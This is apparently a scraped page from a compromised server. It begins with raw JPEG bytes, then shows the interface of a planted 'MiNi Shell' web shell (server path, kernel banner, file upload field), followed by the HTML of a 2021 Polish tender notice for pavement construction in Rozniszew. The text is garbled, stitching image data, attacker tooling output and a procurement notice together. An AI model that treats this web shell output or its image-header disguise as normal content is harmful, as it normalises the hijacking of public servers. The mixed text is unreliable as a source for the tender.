JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210624/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210624/0009360901-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00093609 z dnia 2021-06-24</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Budowa chodnika w ciągu drogi powiatowej 1709W Zakrzew – Mniszew w m. Rozniszew </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Zarząd Dróg Powiatowych w Kozienicach</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">ZDP Kozienice</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 670230860</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Aleksandrówka, Serdeczna 3</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kozienice</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">26-900</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL921 - Radomski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zdpkozienice@orange.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://zdp-kozienice.bip-e.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inna państwowa jednostka organizacyjna nieposiadająca osobowości prawnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Budownictwo i obiekty komunalne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Budowa chodnika w ciągu drogi powiatowej 1709W Zakrzew – Mniszew w m. Rozniszew </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-20208b7d-d4cd-11eb-911f-9ad5f74c2a25</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00093609</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-06-24</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00012182/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.2 Budowa chodnika w ciągu drogi powiatowej nr 1709W Zakrzew-Mniszew w m.Rozniszew</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://starostwo.pzp.kozienicepowiat.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://starostwo.pzp.kozienicepowiat.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1) stały<br/>dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s;2) Komputer klasy<br/>PC lub MAC, o następującej konfiguracji: pamięć min 2GB Ram, procesor Intel IV 2GHZ, jeden z<br/>systemów operacyjnych - MS Windows 10 , Mac Os x 10.4, Linux, lub ich nowsze wersje;3)<br/>zainstalowana dowolna przeglądarka internetowa najlepiej najnowszej dostępnej wersji obsługująca<br/>TLS 1.2 z wyjątkiem Internet Explorer;4) Włączona obsługa JavaScript;5) Zainstalowany program<br/>Acrobat Reader lub inny obsługujący pliki w formacie .pdf.;6) podłączony lub wbudowany do<br/>komputera czytnik karty kryptograficznej wydanej przez wystawcę certyfikatu używanego przez<br/>Wykonawcę)</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 Rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (Dz. Urz. UE L 119 z 04.05.2016 r.) informujemy o zasadach<br/>przetwarzania Pani/Pana danych osobowych oraz o przysługujących Pani/Panu prawach z tymzwiązanych:1. Administratorem Pana/Pani danych osobowych jest Zarząd Dróg Powiatowych w<br/>Kozienicach, reprezentowanym przez Dyrektora ZDP, ul. Serdeczna 3 , 26 - 900 Kozienice, email:<br/>zdpkoz@poczta.onet.pl ).2. W sprawach z zakresu ochrony danych osobowych może Pan/Pani<br/>kontaktować się z Inspektorem Ochrony Danych pod adresem e-mail: iod@ctserv.pl. 3. Dane osobowe<br/>będą przetwarzane w celu realizacji obowiązków prawnych ciążących na Administratorze, przede<br/>wszystkim pełnienia funkcji zarządcy drogi w odniesieniu do dróg powiatowych. Do zadań ZDP w<br/>Kozienicach należy zarządzanie drogami powiatowymi w zakresie planowania, budowy, przebudowy,<br/>remontu, utrzymania i ochrony dróg zgodnie z ustawą o drogach publicznych.4. Dane osobowe będą<br/>przetwarzane przez okres niezbędny do realizacji w/w celów z uwzględnieniem okresów<br/>przechowywania określonych w przepisach odrębnych, w tym przepisów dotyczących zasada<br/>przechowywania akt i klasyfikacji dokumentów archiwalnej.5. Podstawą prawną przetwarzania danych<br/>jest art. 6 ust. 1 lit. c) i e) w/w Rozporządzenia.6. Odbiorcą Pana/Pani danych będą podmioty<br/>upoważnione na mocy przepisów prawa.7. W związku z przetwarzaniem Pani/Pana danych osobowych<br/>przysługują Pani/Panu następujące uprawnienia:1) prawo dostępu do danych osobowych, w tym prawo<br/>do uzyskania kopii tych danych;2) prawo do żądania sprostowania (poprawiania) danych osobowych –<br/>w przypadku gdy dane są nieprawidłowe lub niekompletne;3) prawo do usunięcia danych osobowych<br/>(tzw. prawo do bycia zapomnianym), w przypadku gdy:a) dane nie są już niezbędne do celów, dla<br/>których były zebrane lub w inny sposób przetwarzane,b) osoba, której dane dotyczą wniosła sprzeciw<br/>wobec przetwarzania danych osobowych,c) osoba, której dane dotyczą wycofała zgodę na<br/>przetwarzanie danych osobowych,d) dane osobowe są przetwarzane niezgodne z prawem,e) dane<br/>osobowe muszą być usunięte w celu wywiązania się z obowiązku wynikającego z przepisów prawa;4)<br/>prawo do żądania ograniczenia przetwarzania danych osobowych;5) prawo do przenoszenia danych;6)<br/>prawo sprzeciwu wobec przetwarzania danych osobowych. 8. W przypadku powzięcia informacji o niezgodnym z prawem<br/>przetwarzaniu przez Zarząd Dróg Powiatowy w Kozienicach danych osobowych, przysługuje<br/>Pani/Panu prawo wniesienia skargi do organu nadzorczego – Prezesa Urzędu Ochrony Osobowych na<br/>adres: ul. Stawki 2, 00-193 Warszawa.9. W sytuacji, gdy przetwarzanie danych osobowych odbywa się<br/>na podstawie zgody osoby, której dane dotyczą, podanie przez Pana/Panią danych osobowych<br/>Administratorowi ma charakter dobrowolny.10. Podanie przez Pana/Panią danych osobowych jest<br/>obowiązkowe, w sytuacji gdy przesłankę przetwarzania danych osobowych stanowi przepis prawa lub<br/>zawarta między stronami umowa.11. Administrator danych osobowych nie przetwarza danych<br/>osobowych poza UE oraz nie przekazuje danych poza UE.12. Administrator danych osobowych chroni<br/>wszystkie informacje, w tym dane osobowe przed nieuprawnionym dostępem czy modyfikacją na<br/>poziomie organizacyjnym i technicznym.13. Ponadto, w związku z przetwarzaniem Pana/Pani danych<br/>osobowych nie podlega Pan/Pani decyzjom, które się opierają wyłącznie na zautomatyzowanym<br/>przetwarzaniu, w tym profilowaniu, o czym stanowi art. 22 w/w Rozporządzenia o ochronie danych<br/>osobowych.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZD-T.27.07.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przebudowa drogi polegać będzie na:<br/>1. Wykonanie chodnika o dł. 964 m o zmiennej szerokości 15 i 2,5 m obramowanego krawężnikiem i obrzeżem o następującej konstrukcji:<br/>- kostka brukowa gr. 8 cm na pods. cem – piask. gr. 3 cm.<br/>- grunt stabilizowany cementem gr. 15 cm, o Rm=5,0 MPa,<br/>2.	Wykonanie zjazdów indywidualnych z kostki brukowej o konstrukcji jak wyżej<br/>3.	Wykonanie zjazdu publicznego z kostki brukowej o konstrukcji jak wyżej,<br/>4.	Wykonanie ścieku z korytek wysokich,<br/>5.	Wykonanie przejścia dla pieszych – 1 szt.<br/>6.	Renowacja rowu istniejącego na dł. 100 m<br/>7.	Wykonanie oznakowania poziomego i pionowego </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233100-0 - Roboty w zakresie budowy autostrad, dróg</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2021-10-20</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">matematycznie</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> a)	Wykonawca musi wykazać, że w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy to w tym okresie wykonał należycie, w szczególności zgodnie z zasadami sztuki budowlanej i prawidłowo ukończył realizację co najmniej jednej roboty budowlanej, polegającej na budowie, przebudowie, rozbudowie lub remoncie placu, chodnika, ścieżki rowerowej, parkingu o powierzchni nie mniejszej jak 1000,00 m2 w technologii elementów drobnowymiarowych<br/>b)	Wykonawca musi wykazać, że dysponuje osobami, które zgodnie z przepisami prawa będą mogły w sposób prawidłowy wykonać przedmiot zamówienia, tj. dysponuje minimum jedną osobą, która będzie pełniła funkcję kierownika robót posiadającą uprawnienia do kierowania robotami budowlanymi w specjalności drogowej lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów, która w okresie ostatnich 3 lat przed upływem terminu składania ofert pełniła funkcję kierownika budowy w odniesieniu do minimum 1 roboty budowlanej obejmującej budowę, przebudowę, rozbudowę lub remont placu, chodnika, ścieżki rowerowej, parkingu o powierzchni nie mniejszej jak 1000,00 m2 w technologii elementów drobnowymiarowych <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1.Wypełniony formularz ofertowy i kosztorys ofertowy– wzór stanowi załącznik nr 1 do SWZ. i<br/>1 2. Oświadczenie dotyczące spełniania warunków udziału w postępowaniu, aktualne na dzień<br/>składania ofert –wzór stanowi załącznik nr 2 do SWZ. 3. Oświadczenie dotyczące przesłanek<br/>wykluczenia z postępowania, aktualne na dzień składania ofert – wzór stanowi załącznik nr 3 do<br/>SWZ.Oświadczenia z pkt 2 i 3 składają odrębnie:- wykonawca/każdy spośród wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia. W takim przypadku oświadczenie<br/>potwierdza brak podstaw wykluczenia wykonawcy oraz spełnianie warunków udziału w<br/>postępowaniu w zakresie,w jakim każdy z wykonawców wykazuje spełnianie warunków udziału<br/>w postępowaniu;- podmiot trzeci, na którego potencjał powołuje się wykonawca celem<br/>potwierdzenia spełnienia warunków udziału w postępowaniu. W takim przypadku oświadczenie<br/>potwierdza brak podstaw wykluczenia podmiotu oraz spełnianie warunków udziału w<br/>postępowaniu w zakresie, w jakim podmiot udostępnia swoje zasoby wykonawcy (wzór stanowi<br/>załącznik nr 3aSWZ);4.Zobowiązanie podmiotów trzecich (dotyczy tylko sytuacji gdy<br/>Wykonawca polega na zdolnościach lub sytuacji innych podmiotów na zasadach określonych w<br/>art. 118 ustawy Pzp). Zobowiązanie podmiotu udostępniającego zasoby lub inny podmiotowy<br/>środek dowodowy potwierdza, że stosunek łączący wykonawcę z podmiotami udostępniającymi<br/>zasoby gwarantuje rzeczywisty dostęp do tych zasobów oraz określa w szczególności:- zakres<br/>dostępnych wykonawcy zasobów podmiotu udostępniającego zasoby;- sposób i okres<br/>udostępnienia wykonawcy i wykorzystania przez niego zasobów podmiotu udostępniającego te<br/>zasoby przy wykonywaniu zamówienia;- czy i w jakim zakresie podmiot udostępniający zasoby,<br/>na zdolnościach którego wykonawca polega w odniesieniu do warunków udziału w<br/>postępowaniu dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, zrealizuje<br/>roboty budowlane lub usługi, których wskazane zdolności dotyczą - wzór stanowi załącznik nr 10<br/>do SWZ. 5. Pełnomocnictwo do podpisania oferty. Gdy umocowanie osoby składającej ofertę<br/>nie wynika z dokumentów rejestrowych, wykonawca, który składa ofertę za<br/>pośrednictwem pełnomocnika, powinien dołączyć do oferty dokument pełnomocnictwa<br/>obejmujący swym zakresem umocowanie do złożenia oferty lub do złożenia oferty i podpisania<br/>umowy. W przypadku wykonawców ubiegających się wspólnie o udzielenie zamówienia<br/>wykonawcy zobowiązani są do ustanowienia pełnomocnika. Dokument pełnomocnictwa, z treści<br/>którego będzie wynikało umocowanie do reprezentowania w postępowaniu o udzielenie<br/>zamówienia tych wykonawców należy załączyć do oferty. Pełnomocnictwo powinno być<br/>załączone do oferty i powinno zawierać w szczególności wskazanie:- postępowania o<br/>zamówienie publiczne, którego dotyczy,- wszystkich wykonawców ubiegających się wspólnie o<br/>udzielenie zamówienia wymienionych z nazwy z określeniem adresu siedziby,- ustanowionego<br/>pełnomocnika oraz zakresu jego umocowania.6.Dokumenty uwiarygodniające zastosowanie<br/>rozwiązań równoważnych w przypadku ich zaoferowania przez wykonawcę.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 6000,00 <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.W przypadku wykonawców ubiegających się wspólnie o udzielenie zamówienia wykonawcy<br/>zobowiązani są do ustanowienia pełnomocnika. Dokument pełnomocnictwa, z treści<br/>którego będzie wynikało umocowanie do reprezentowania w postępowaniu o udzielenie<br/>zamówienia tych wykonawców należy załączyć do oferty. Pełnomocnictwo powinno być<br/>załączone do oferty i powinno zawierać w szczególności wskazanie:- postępowania o<br/>zamówienie publiczne, którego dotyczy,- wszystkich wykonawców ubiegających się wspólnie o<br/>udzielenie zamówienia wymienionych z nazwy z określeniem adresu siedziby,- ustanowionego<br/>pełnomocnika oraz zakresu jego umocowania.2. Wykonawcy mogą wspólnie ubiegać się o<br/>udzielenie zamówienia składając następujące dokumenty: a) oświadczenie o ustanowieniu<br/>pełnomocnika do reprezentowania wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie<br/>zamówienia publicznego;oświadczenie należy dołączyć do oferty w oryginale lub notarialnie<br/>poświadczonej kopii, b) każdy z wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia składa oddzielne dokumenty wymienione w dziale 14 ust. 1 SWZ w zakresie, w<br/>którym każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu oraz brak<br/>podstaw wykluczenia, c) dokumenty, o których mowa w dziale 15 ust.1 pkt i 2 SWZ, winni złożyć<br/>wspólnie. d) dokumenty o których mowa w dziale 15 ust.1 pkt 3 SWZ składa każdy z<br/>wykonawców wspólnie ubiegających się o zamówienie we własnym imieniu.3. Wszelka<br/>korespondencja dokonywana będzie wyłącznie z pełnomocnikiem. 4. Wypełniając formularz<br/>ofertowy - załącznik nr 1 do SWZ w miejscu „nazwa i adres wykonawcy” należy wpisać dane<br/>dotyczące wszystkich wykonawców ubiegających się wspólnie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Umowę można zmienić, jeżeli wystąpią istotne okoliczności, których nie można było przewidzieć<br/>w chwili zawarcia umowy, w szczególności: - działanie siły wyższej; - okoliczności powodujące,<br/>że przedmiot umowy nie może zostać zrealizowany zgodnie z zasadami sztuki inżynierskiej; -<br/>zmiany obowiązującego prawa powodujące, że realizacja przedmiotu umowy w niezmienionej<br/>postaci stanie się niecelowa; - niezależna od Zamawiającego i Wykonawcy przewlekłość<br/>postępowania o uzyskanie od instytucji i urzędów dokumentów (np. orzeczeń, pozwoleń, decyzji,<br/>uzgodnień) niezbędnych do realizacji przedmiotu umowy; - zaistnienie okoliczności leżących po<br/>stronie Zamawiającego, w szczególności spowodowanych sytuacją finansową, zdolnościami<br/>płatniczymi, warunkami organizacyjnymi lub okolicznościami, które nie były możliwe do<br/>przewidzenia w chwili zawarcia umowy - zmianie mogą ulec termin realizacji umowy; - gdy<br/>zaistnieje inna, niemożliwa do przewidzenia w momencie zawarcia umowy okoliczność prawna ekonomiczna lub techniczna, za którą żadna ze stron nie ponosi odpowiedzialności, skutkująca<br/>brakiem możliwości należytego wykonania, zgodnie ze specyfikacją istotnych warunków<br/>zamówienia - zamawiający dopuszcza możliwość zmiany umowy, w szczególności terminu<br/>realizacji zamówienia; - wystąpienie okoliczności powodujących zmiany w wysokości<br/>wynagrodzenia umownego w całości (np. w przypadku urzędowej zmiany stawki podatku VAT); -<br/>wystąpienie okoliczności powodujących konieczność zmiany terminu wykonania robót (np.<br/>roboty dodatkowe niezbędne do wykonania należytego zamówienia wynikłe w trakcie realizacji<br/>zamówienia powodujące przesunięcie robót podstawowych); - zmiana formy zabezpieczenia<br/>należytego wykonania umowy; - z uwagi na niezależne od Stron umowy zmiany dotyczące osób<br/>kluczowych dla realizacji umowy np. kierownika budowy, inspektora nadzoru, osób<br/>reprezentujących Strony (w szczególności choroba, wypadki losowe, nieprzewidziane zmiany<br/>organizacyjne); - zmian 